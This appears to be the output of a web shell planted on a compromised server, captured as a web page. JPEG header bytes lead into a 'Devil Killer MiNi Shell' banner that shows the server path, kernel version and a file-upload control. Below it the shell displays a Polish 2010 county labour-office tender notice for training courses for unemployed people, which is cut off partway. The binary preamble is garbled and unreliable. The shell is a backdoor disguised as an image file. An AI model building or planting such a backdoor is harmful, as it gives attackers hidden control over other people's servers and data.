JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100611/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100611/150957-N-2010.html

<p class="kh_header"><b>Chodzież: Zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych</b><br>
<b>Numer ogłoszenia: 150957 - 2010; data zamieszczenia: 11.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Chodzieży , ul. Składowa 5, 64-800 Chodzież, woj. wielkopolskie, tel. 067 282 04 65, faks 067 282 04 65.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pupchodziez.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkoleń dla osób bezrobotnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem niniejszego zamówienia jest zorganizowanie i przeprowadzenie n/w szkoleń:
Część A: Nazwa szkolenia:Obsługa wózka widłowego z programem magazynowym z egzaminem państwowym dla 20 osób bezrobotnych (2 grupy po 10 osób)/100godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r.
Część B:Nazwa szkolenia: Przedstawiciel handlowy - nowoczesne techniki sprzedaży dla 15 osób bezrobotnych/110 godzin zegarowych na 1 uczestnika.Termin szkolenia od lipca 2010r. do listopada 2010r.
Część C: Nazwa szkolenia: Pracownik administracyjno - biurowy z językiem niemieckim w stopniu podstawowym dla 10 osób bezrobotnych/140 godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r.
Część D: Nazwa szkolenia: Pilarz - drwal dla 10 osób bezrobotnych/150 godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r.
Część E: Nazwa szkolenia:Szwaczka dla 10 osób bezrobotnych/120 godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r.
Część F: Nazwa szkolenia: Prowadzenie własnej działalności gospodarczej dla 30 osób bezrobotnych (2 grupy po 15 osób)/80 godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r.
Część G:Nazwa szkolenia: Opiekun osób starszych dla 15 osób bezrobotnych/90 godzin zegarowych na 1 uczestnika.Termin szkolenia od lipca 2010r. do listopada 2010r.
Część H: Nazwa szkolenia: Prawo jazdy kat. C+E z egzaminem państwowym dla 15 osób bezrobotnych/45 godzin zegarowych na 1 uczestnika.Termin szkolenia od lipca 2010r. do listopada 2010r.
Część I: Nazwa szkolenia: Kurs komputerowy podstawowy dla 10 osób bezrobotnych/60 godzin zegarowych na 1 uczestnika. Termin szkolenia od lipca 2010r. do listopada 2010r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9, 80.41.12.00-0, 80.53.31.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 6 do SIWZ oraz dokumentów , które Zamawiający określił w SIWZ. Ocena spełnienia warunków będzie dokonywana przy zastosowaniu kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 6 do SIWZ oraz dokumentów , które Zamawiający określił w SIWZ. Ocena spełnienia warunków będzie dokonywana przy zastosowaniu kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 6 do SIWZ oraz dokumentów , które Zamawiający określił w SIWZ. Ocena spełnienia warunków będzie dokonywana przy zastosowaniu kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 6 do SIWZ oraz dokumentów , które Zamawiający określił w SIWZ. Ocena spełnienia warunków będzie dokonywana przy zastosowaniu kryterium: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na podstawie złożonego oświadczenia o spełnianiu warunków udziału w postępowaniu - zgodnie z załącznikiem nr 6 do SIWZ oraz dokumentów , które Zamawiający określił w SIWZ. Ocena spełnienia warunków będzie dokonywana przy zastosowaniu kryterium: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony Formularz ofertowy (załącznik nr 2 do SIWZ).
2.	Wypełniony Program szkolenia (załącznik nr 3 do SIWZ).
3.	Wzór umowy z zaparafowanymi wszystkimi stronami przez Wykonawcę (załącznik nr 4 do SIWZ lub załącznik nr 5 do SIWZ).
4.	Oświadczenie, że Wykonawca spełnia warunki określone przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych (załącznik nr 6 do SIWZ).
5.	Oświadczenie, że Wykonawca nie podlega wykluczeniu określonemu przepisami 
art. 24 ustawy Prawo zamówień publicznych (załącznik nr 7 do SIWZ).
6.	Aktualny odpis z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, poświadczone przez Wykonawcę za zgodność z oryginałem, wystawione nie wcześniej niż sześć miesięcy przed upływem terminu składania oferty.
7.	Kserokopia zaświadczenia o wpisie instytucji szkoleniowej do rejestru instytucji szkoleniowych.
8.	Uwierzytelnioną przez Wykonawcę kopię dokumentu potwierdzającego prawo do dysponowania lokalem umożliwiającym prowadzenie zajęć, w przypadku gdy jednostka szkoląca nie posiada własnego lokalu - sal dydaktycznych na terenie Chodzieży.
9.	Kserokopie dokumentów potwierdzających kwalifikacje kadry dydaktycznej.
10.	Upoważnienie/pełnomocnictwo określające zakres reprezentacji (w przypadku, gdy Wykonawcę reprezentuje pełnomocnik) dla tej osoby, podpisane przez osoby upoważnione do reprezentowania Wykonawcy, zgodnie z reprezentacją wynikającą z właściwego rejestru, wystawione nie wcześniej niż trzy miesiące przed upływem terminu składania ofert.
11.	Wypełniony preliminarz kosztów szkolenia (załącznik nr 8 do SIWZ).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następujących przypadkach:
a)	rekrutacji mniejszej liczby uczestników szkolenia w stosunku do zakładanej liczby uczestników, dopuszcza się zmianę liczby uczestników, a co za tym idzie wynagrodzenia Wykonawcy, biorąc pod uwagę jednostkowy koszt szkolenia osoby,
b)	w sytuacjach losowych, jakie mogą wystąpić po stronie osób stanowiących kadrę dydaktyczną, dopuszcza się możliwość dokonania zmian w składzie kadry dydaktycznej. W takim przypadku Wykonawca powinien zapewnić osoby na zastępstwo o równorzędnych lub wyższych kwalifikacjach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pupchodziez.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Chodzieży
ul. Składowa 5
64-800 Chodzież.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Chodzieży
ul. Składowa 5
64-800 Chodzież, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Szkolenia będą współfinansowane z Europejskiego Funduszu Społecznego w ramach Działania 6.1 Poprawa dostępu do zatrudnienia oraz wspieranie aktywności zawodowej w regionie Poddziałanie 6.1.3 Poprawa zdolności do zatrudnienia oraz podnoszenia poziomu aktywności zawodowej osób bezrobotnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obsługa wózka widłowego z programem magazynowym z egzaminem państwowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 20 osób (2 grupy po 10  osób)/100 godzin zegarowych na 1 uczestnika szkolenia.Szkolenie obejmuje m.in. zajęcia z zakresu przepisów bhp i ppoż. podczas pracy w magazynie - hurtowni, przyjmowania i wydawania towarów, wykonywania czynności reklamacyjnych w zakresie wad jakościowych, braków lub nadwyżek, praktycznego rozmieszczania i układania przyjętych towarów na wyznaczonej powierzchni magazynowej, przechowywania towarów zabezpieczając przed zepsuciem, zniszczeniem i kradzieżą jak również prowadzenia dokumentacji magazynowej przy użyciu programów  komputerowych stosowanych w firmach handlowych (sklepach, hurtowniach magazynach), poznanie budowy i zasad eksploatacji wózka widłowego, zdobycia uprawnień do obsługi wózka widłowego.

Celem szkolenia jest uzyskanie przez uczestników wiedzy i umiejętności praktycznych oraz kwalifikacji w zawodzie operator wózka widłowego.
W cenie szkolenia należy uwzględnić cenę za egzamin państwowy.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko zajęć praktycznych.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko komputerowe..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedstawiciel handlowy - nowoczesne techniki sprzedaży.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 15 osób/110 godzin zegarowych na 1 uczestnika szkolenia. Szkolenie obejmuje m.in. zajęcia z zakresu różnych technik sprzedaży, pozyskiwania klientów, przeprowadzania prezentacji produktu, poznawania typów komunikacji międzyludzkiej - werbalnej i niewerbalnej, nabycia umiejętności zaplanowania i zorganizowania swoich zajęć oraz umiejętności handlowo - negocjacyjnych, analizy sektora sprzedaży i klientów, prognozowania sprzedaży, sporządzania karty wizyt klienta, dokumentacji klienta jak również praktycznej obsługi klienta.

Celem szkolenia jest uzyskanie przez uczestników wiedzy oraz kwalifikacji w zawodzie przedstawiciel handlowy.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko komputerowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> C.	Pracownik administracyjno - biurowy z językiem niemieckim w stopniu podstawowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 10 osób  bezrobotnych/140 godzin zegarowych

Szkolenie obejmuje m.in. organizację  pracy własnej, sporządzanie pism, gromadzenie, rejestrowanie i przekazywanie informacji, profesjonalną obsługę klienta,  obsługę urządzeń biurowych i programów komputerowych, sporządzanie korespondencji dotyczącej spraw administracyjnych, handlowych i osobowych, kształtowanie pożądanej atmosfery w pracy, stosowanie norm i zasad decydujących o prezencji i wyglądzie, komunikowanie się w języku niemieckim.

Celem szkolenia jest przygotowanie uczestników do pracy w zawodzie pracownik administracyjno - biurowy oraz nauka języka niemieckiego w stopniu podstawowym.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko komputerowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pilarz - drwal.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 10 osób bezrobotnych/150 godzin zegarowych

Szkolenie obejmuje m.in. zagadnienia z zakresu budowy i obsługi pił, okrzesywania, ścinania drzew zawieszonych, obalania drzew z korzeniami, przerzynki drewna leżącego, sortowania tarcicy, bezpieczeństwa i higieny pracy na stanowisku drwala.

Celem szkolenia jest uzyskanie przez uczestników wiedzy i umiejętności praktycznych oraz kwalifikacji w zawodzie pilarz-drwal..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Szwaczka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 10 osób bezrobotnych - 120 godzin zegarowych

Szkolenie obejmuje m.in. zajęcia z zakresu przepisów bhp i ppoż. podczas pracy, obsługi maszyn stębnówki, overlock, przemysłowych i szwalniczych, dziurkarki, guzikarki, ryglówki, do haftowania, szycia elementów (np.: kołnierze, paski, kieszenie itp.), pikowania, wykańczania, wszywania, naszywania.

Celem szkolenia jest uzyskanie przez uczestników wiedzy i umiejętności praktycznych oraz kwalifikacji w zawodzie szwaczka.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Prowadzenie własnej działalności gospodarczej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 30 osób bezrobotnych (2 grupy po 15 osób) - 80 godzin zegarowych

Szkolenie obejmuje m.in. zagadnienia prawne i organizacyjne związane z założeniem i prowadzeniem własnej firmy, zagadnienia w zakresie kształtowania wizerunku firmy, pozyskiwania funduszy unijnych, podstaw księgowości i rachunkowości, przepisów kodeksu pracy, metod badania rynku, pozyskiwania kapitału firmy, sporządzania prognoz, zarządzania finansami małej firmy oraz przygotowania i oceny biznesplanów.

Celem szkolenia jest przygotowanie uczestników do prowadzenia własnej działalności gospodarczej.

Jedna osoba bezrobotna ma przypadać na jedno stanowisko komputerowe.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
<li>3. kwalifikacje kadry dydaktycznej - 20</li>
<li>4. dostosowanie jakości pomieszczeń oraz wyposażenia w sprzęt i pomoce dydaktyczne do potrzeb określonego szkolenia, z uwzględnieniem bezpiecznych i higi - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Opiekun osób starszych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie dla 15 osób bezrobotnych - 90 godzin zegarowych

Szkolenie obejmuje m.in. zajęcia z zakresu teoretycznej i praktycznej organizacji całodziennej opieki dla starszej osoby, wykonywania codziennych czynności z zakresu gospodarstwa domowego podopiecznego, wykonywania czynności higienicznych przy podopiecznym, wspierania biologicznych funkcji życiowych podopiecznego, organizowania czasu podopiecznemu i dotrzymywania towarzystwa, udzielania pierwszej pomocy w sytuacji zagrożenia życia, wspomagania podopiecznego w pokonywaniu trudności życiowych.

Celem szkolenia jest uzyskanie przez uczestników wiedzy i umiejętności praktycznych oraz kwalifikacji w zawodzie opiekun osób starszych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. program szkolenia - 30</li>
